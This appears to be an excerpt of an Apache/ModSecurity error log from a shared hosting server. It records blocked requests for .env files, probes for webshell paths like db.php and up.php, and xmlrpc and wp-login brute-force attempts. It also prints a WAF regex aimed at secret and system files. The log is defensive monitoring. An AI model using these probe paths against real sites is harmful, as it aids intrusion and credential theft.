[Tue May 26 15:41:02.492003 2026] [security2:error] [pid 733610:tid 733843] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxtsLL_4PasUNKBsfUoQAAAGc"]
[Tue May 26 15:41:02.939578 2026] [security2:error] [pid 733610:tid 733752] [client 52.167.144.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVxtcLL_4PasUNKBsfUhwAAAAw"]
[Tue May 26 15:41:03.404852 2026] [security2:error] [pid 733610:tid 733846] [client 195.178.110.34:33740] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/new/.env"] [unique_id "ahVxt8LL_4PasUNKBsfUyAAAAGo"]
[Tue May 26 15:41:03.750585 2026] [security2:error] [pid 733610:tid 733756] [client 45.133.170.131:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxt8LL_4PasUNKBsfU0QAAABA"]
[Tue May 26 15:41:04.244212 2026] [security2:error] [pid 733610:tid 733770] [client 172.226.44.158:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVxtsLL_4PasUNKBsfUrgAAAB4"]
[Tue May 26 15:41:04.578528 2026] [security2:error] [pid 733610:tid 733805] [client 45.133.170.131:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxuMLL_4PasUNKBsfU6gAAAEE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1269679
[Tue May 26 15:41:04.631417 2026] [security2:error] [pid 733610:tid 733779] [client 149.20.243.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxuMLL_4PasUNKBsfU7QAAACc"], referer: https://anujtradingco.com
[Tue May 26 15:41:04.927574 2026] [security2:error] [pid 733610:tid 733824] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxuMLL_4PasUNKBsfU5wAAAFQ"]
[Tue May 26 15:41:06.397073 2026] [security2:error] [pid 733610:tid 733847] [client 45.154.98.150:52479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shop.taotechservices.com"] [uri "/wp-plain.php"] [unique_id "ahVxusLL_4PasUNKBsfVGwAAAGs"], referer: www.google.com
[Tue May 26 15:41:06.409758 2026] [security2:error] [pid 733610:tid 733826] [client 45.154.98.150:52484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shop.taotechservices.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVxusLL_4PasUNKBsfVHAAAAFY"], referer: www.google.com
[Tue May 26 15:41:06.421849 2026] [security2:error] [pid 733610:tid 733770] [client 45.154.98.150:52486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shop.taotechservices.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVxusLL_4PasUNKBsfVHQAAAB4"]
[Tue May 26 15:41:06.862660 2026] [security2:error] [pid 733610:tid 733850] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxusLL_4PasUNKBsfVIAAAAG4"]
[Tue May 26 15:41:06.883411 2026] [security2:error] [pid 733610:tid 733782] [client 45.154.98.150:59507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shop.taotechservices.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVxusLL_4PasUNKBsfVLwAAACo"], referer: www.google.com
[Tue May 26 15:41:06.950586 2026] [security2:error] [pid 733610:tid 733757] [client 45.154.98.150:55696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shop.taotechservices.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVxusLL_4PasUNKBsfVMgAAABE"]
[Tue May 26 15:41:07.176270 2026] [security2:error] [pid 733610:tid 733755] [client 45.154.98.150:64176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shop.taotechservices.com"] [uri "/musdhvra.php"] [unique_id "ahVxu8LL_4PasUNKBsfVPAAAAA8"], referer: www.google.com
[Tue May 26 15:41:07.278584 2026] [security2:error] [pid 733610:tid 733626] [remote 216.73.216.30:48932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxu8LL_4PasUNKBsfVQwAAPw8"]
[Tue May 26 15:41:07.729868 2026] [security2:error] [pid 733610:tid 733791] [client 45.154.98.150:61989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shop.taotechservices.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVxu8LL_4PasUNKBsfVVwAAADM"]
[Tue May 26 15:41:07.835265 2026] [security2:error] [pid 733610:tid 733659] [remote 5.250.187.247:35348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.187.250.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVxu8LL_4PasUNKBsfVTwAAfTA"]
[Tue May 26 15:41:07.865655 2026] [security2:error] [pid 733610:tid 733844] [client 45.154.98.150:58772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shop.taotechservices.com"] [uri "/wp-plain.php"] [unique_id "ahVxu8LL_4PasUNKBsfVYQAAAGg"], referer: www.google.com
[Tue May 26 15:41:08.132307 2026] [security2:error] [pid 733610:tid 733813] [client 45.154.98.150:59745] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shop.taotechservices.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVxvMLL_4PasUNKBsfVYwAAAEk"]
[Tue May 26 15:41:08.390402 2026] [security2:error] [pid 733610:tid 733745] [client 45.154.98.150:64203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shop.taotechservices.com"] [uri "/dsuubdry.php"] [unique_id "ahVxvMLL_4PasUNKBsfVcwAAAAU"], referer: www.google.com
[Tue May 26 15:41:08.497294 2026] [security2:error] [pid 733610:tid 733787] [client 45.154.98.150:60754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shop.taotechservices.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVxvMLL_4PasUNKBsfVdAAAAC8"]
[Tue May 26 15:41:08.684552 2026] [security2:error] [pid 733610:tid 733742] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxvMLL_4PasUNKBsfVbwAAAAI"]
[Tue May 26 15:41:10.411596 2026] [security2:error] [pid 733610:tid 733830] [client 195.178.110.34:40496] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/new/.env"] [unique_id "ahVxvsLL_4PasUNKBsfVsAAAAFo"]
[Tue May 26 15:41:10.432202 2026] [security2:error] [pid 733610:tid 733772] [client 103.153.130.62:58373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxvsLL_4PasUNKBsfVpQAAACA"]
[Tue May 26 15:41:10.432315 2026] [security2:error] [pid 733610:tid 733772] [client 103.153.130.62:58373] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxvsLL_4PasUNKBsfVpQAAACA"]
[Tue May 26 15:41:10.774701 2026] [security2:error] [pid 733610:tid 733854] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxvsLL_4PasUNKBsfVrAAAAHI"]
[Tue May 26 15:41:10.776854 2026] [security2:error] [pid 733610:tid 733762] [client 171.25.193.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "virgence.com"] [uri "/index.php"] [unique_id "ahVxvsLL_4PasUNKBsfVtgAAABY"]
[Tue May 26 15:41:12.092160 2026] [security2:error] [pid 733610:tid 733844] [client 223.123.38.127:15224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxv8LL_4PasUNKBsfV2wAAAGg"]
[Tue May 26 15:41:12.092387 2026] [security2:error] [pid 733610:tid 733844] [client 223.123.38.127:15224] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxv8LL_4PasUNKBsfV2wAAAGg"]
[Tue May 26 15:41:12.193860 2026] [security2:error] [pid 733610:tid 733816] [client 176.65.139.233:61044] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "wrapmachines.com"] [uri "/.env"] [unique_id "ahVxwMLL_4PasUNKBsfV6QAAAEw"]
[Tue May 26 15:41:13.015277 2026] [security2:error] [pid 733610:tid 733788] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxwMLL_4PasUNKBsfV8gAAADA"]
[Tue May 26 15:41:14.285186 2026] [security2:error] [pid 733610:tid 733773] [client 92.176.213.160:53721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.213.176.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mosykay.com"] [uri "/xmlrpc.php"] [unique_id "ahVxwsLL_4PasUNKBsfWEgAAACE"]
[Tue May 26 15:41:14.285377 2026] [security2:error] [pid 733610:tid 733773] [client 92.176.213.160:53721] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "mosykay.com"] [uri "/xmlrpc.php"] [unique_id "ahVxwsLL_4PasUNKBsfWEgAAACE"]
[Tue May 26 15:41:14.989876 2026] [security2:error] [pid 733610:tid 733813] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxwsLL_4PasUNKBsfWJgAAAEk"]
[Tue May 26 15:41:15.431030 2026] [security2:error] [pid 733610:tid 733744] [client 31.57.184.107:63707] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aastha-enterprises.onesoft.in"] [uri "/wp-login.php"] [unique_id "ahVxw8LL_4PasUNKBsfWQwAAAAQ"]
[Tue May 26 15:41:16.627616 2026] [security2:error] [pid 733610:tid 733860] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxxMLL_4PasUNKBsfWZAAAAHg"]
[Tue May 26 15:41:19.179646 2026] [security2:error] [pid 733610:tid 733806] [client 91.142.73.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahVxxcLL_4PasUNKBsfWnwAAAEI"], referer: http://obinnawrites.com/2022/12/05/why-fear-will-cripple-your-career
[Tue May 26 15:41:20.065881 2026] [security2:error] [pid 733610:tid 733810] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxx8LL_4PasUNKBsfW0gAAAEY"]
[Tue May 26 15:41:20.836906 2026] [security2:error] [pid 733610:tid 733757] [client 103.153.130.62:58646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxyMLL_4PasUNKBsfW9QAAABE"]
[Tue May 26 15:41:20.837152 2026] [security2:error] [pid 733610:tid 733757] [client 103.153.130.62:58646] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxyMLL_4PasUNKBsfW9QAAABE"]
[Tue May 26 15:41:21.320548 2026] [security2:error] [pid 733610:tid 733861] [client 223.123.38.127:15225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxycLL_4PasUNKBsfXAwAAAHk"]
[Tue May 26 15:41:21.320670 2026] [security2:error] [pid 733610:tid 733861] [client 223.123.38.127:15225] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxycLL_4PasUNKBsfXAwAAAHk"]
[Tue May 26 15:41:21.578301 2026] [security2:error] [pid 733610:tid 733836] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxycLL_4PasUNKBsfW_wAAAGA"]
[Tue May 26 15:41:22.764051 2026] [security2:error] [pid 733610:tid 733867] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxysLL_4PasUNKBsfXKgAAAH8"]
[Tue May 26 15:41:25.737392 2026] [security2:error] [pid 733610:tid 733856] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxzcLL_4PasUNKBsfXhwAAAHQ"]
[Tue May 26 15:41:25.912769 2026] [security2:error] [pid 733610:tid 733845] [client 45.141.215.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "virgence.com"] [uri "/index.php"] [unique_id "ahVxzcLL_4PasUNKBsfXlgAAAGk"]
[Tue May 26 15:41:26.959309 2026] [security2:error] [pid 733610:tid 733742] [client 113.184.136.100:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxzsLL_4PasUNKBsfXrQAAAAI"]
[Tue May 26 15:41:26.993272 2026] [security2:error] [pid 733610:tid 733729] [remote 216.73.216.30:48932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxzsLL_4PasUNKBsfXuwAAQHY"]
[Tue May 26 15:41:27.097472 2026] [security2:error] [pid 733610:tid 733784] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxzsLL_4PasUNKBsfXtAAAACw"]
[Tue May 26 15:41:27.777440 2026] [security2:error] [pid 733610:tid 733648] [remote 74.7.241.58:57946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVxz8LL_4PasUNKBsfXzwAAciU"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/nationspioneer.com/wp-includes/Requests/Utility
[Tue May 26 15:41:28.225885 2026] [security2:error] [pid 733610:tid 733642] [remote 103.95.119.103:44884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVx0MLL_4PasUNKBsfX2AAAEx8"]
[Tue May 26 15:41:28.684303 2026] [security2:error] [pid 733610:tid 733789] [client 130.83.9.230:45804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVx0MLL_4PasUNKBsfX6wAAADE"]
[Tue May 26 15:41:29.863276 2026] [security2:error] [pid 733610:tid 733816] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx0cLL_4PasUNKBsfYAQAAAEw"]
[Tue May 26 15:41:29.997371 2026] [security2:error] [pid 733610:tid 733862] [client 2a02:c206:2069:6069::1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVx0cLL_4PasUNKBsfX9QAAen8"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 15:41:30.123305 2026] [security2:error] [pid 733610:tid 733809] [client 130.83.9.230:45812] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVx0sLL_4PasUNKBsfYGQAAAEU"]
[Tue May 26 15:41:30.392201 2026] [security2:error] [pid 733610:tid 733834] [client 45.92.1.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "virgence.com"] [uri "/index.php"] [unique_id "ahVx0sLL_4PasUNKBsfYHgAAAF4"]
[Tue May 26 15:41:30.624203 2026] [autoindex:error] [pid 733610:tid 733766] [client 91.224.92.120:64746] AH01276: Cannot serve directory /home2/dassms2z/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 15:41:31.151225 2026] [security2:error] [pid 733610:tid 733864] [client 103.153.130.62:58913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVx08LL_4PasUNKBsfYMgAAAHw"]
[Tue May 26 15:41:31.151359 2026] [security2:error] [pid 733610:tid 733864] [client 103.153.130.62:58913] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVx08LL_4PasUNKBsfYMgAAAHw"]
[Tue May 26 15:41:31.858427 2026] [security2:error] [pid 733610:tid 733850] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx08LL_4PasUNKBsfYPgAAAG4"]
[Tue May 26 15:41:31.995175 2026] [security2:error] [pid 733610:tid 733638] [remote 216.73.216.30:48932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVx08LL_4PasUNKBsfYSAAAShs"]
